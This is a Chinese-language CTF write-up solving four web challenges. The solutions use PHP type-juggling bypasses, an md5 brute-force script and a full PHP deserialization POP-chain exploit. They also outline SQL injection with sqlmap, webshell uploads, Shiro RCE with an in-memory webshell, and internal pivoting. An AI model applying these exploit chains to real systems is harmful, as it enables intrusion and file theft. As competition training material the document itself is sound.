WEB
0x01 [強網先鋒]尋寶
根據題目信息可以知道,需要從中獲取兩個KEY,然后獲得flag
題目源碼
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
function filter($string){
$filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
$filter_phrase= '/'.implode('|',$filter_word).'/';
return preg_replace($filter_phrase,'',$string);
}
if($ppp){
unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';
extract($_POST);
$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);
if(isset($num1) && is_numeric($num1)){
die("非數字");
}
else{
if($num1 > 1024){
echo "第一層";
if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
echo "第二層";
if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
echo "第三層";
if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
echo "第四層";
if(!isset($num5)||(strlen($num5)==0)) die("no");
$b=json_decode(@$num5);
if($y = $b === NULL){
if($y === true){
echo "第五層";
include 'KeY1lhv.php';
echo $KEY1;
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no111");
}
}
KEY1:
第一層,字符串比較,構造$num1=1027a繞過
第二層,需要繞過 intval() ,使用科學計數法繞過 $num2=6e5
第三層,寫腳本跑md5, $num3=61823470
import hashlib
def md5_encode(num3):
return hashlib.md5(num3.encode()).hexdigest()[0:7]
for i in range(60000000,700000000):
num3 = md5_encode(str(i))
# print(num3)
if num3 == '4bf21cd':
print(i)
break
第四層,同樣使用科學計數法繞過,構造$num4=0e00000
第五層,利用json_decode在解析非json格式數據的時候會自動置NULL繞過, 構造$num5=aaa
得到KEY1:KEY1{e1e1d3d40573127e9ee0480caf1283d6}
KEY2:
根據題目描述,使用支持自動分片下載的工具下載文件
解壓后得到一堆docx文件
隨便打開一個發現是一堆字符,猜測KEY2就在其中某一個文件中,寫腳本跑
exp
import os
import docx
for i in range(1,20):
for j in range(1,20):
path = "./5.{0}/VR_{1}".format(i,j)
files = os.listdir(path)
# print(filePath)
for file in files:
try:
fileName = path+"/"+file
# print(fileName)
file = docx.Document(fileName)
for content in file.paragraphs:
# print(content.text)
if "KEY2{" in content.text:
print(content.text)
print(fileName)
break
except:
pass
得到KEY2 : KEY2{T5fo0Od618l91SlG6l1l42l3a3ao1nblfsS}
在原頁面上提交獲取flag:
0x02 [強網先鋒]賭徒
根據提示,掃目錄在www.zip下得到源碼
index.php
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}
?>
分析源碼后,發現是php反序列化,構造pop鏈如下
<?php
error_reporting(1);
class Start
{
public $name='guest';
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag."\n\n";
return ;
}
}
class Info
{
public $promise='I do';
public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __get($name){
$function = $this->a;
return $function();
}
public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
$start=new Start();
$info=new Info();
$room=new Room();
$info->file['filename']=$room;
$start->name=$info;
$room->a=$room;
$room->sth_to_set=$start;
echo serialize($room);
?>
base64解碼后得到flag(注:前面有個hi,要將其剔除在解碼)
0x03 EasyWeb
掃端口發現還有36842開放
登錄頁面用戶名出存在sql注入,sqlmap一把梭,即可獲取用戶名,密碼
登錄進后台,掃目錄發現上傳路由
構造上傳,蟻劍連接
使用ew代理出來后掃描端口 ,發現8006開放着jboss服務
獲取flag
0x04 Hard_Penetration
shiro rce,注入內存馬后使用冰蠍連接,發現當前用戶為ctf,無法讀取flag,於是使用ew代理出來掃端口,在8005端口有一個php站點,發現為TP3.1.3開發的CMS,審計源碼后發現存在文件包含
構造shell去包含
使用蟻劍連接,獲得flag
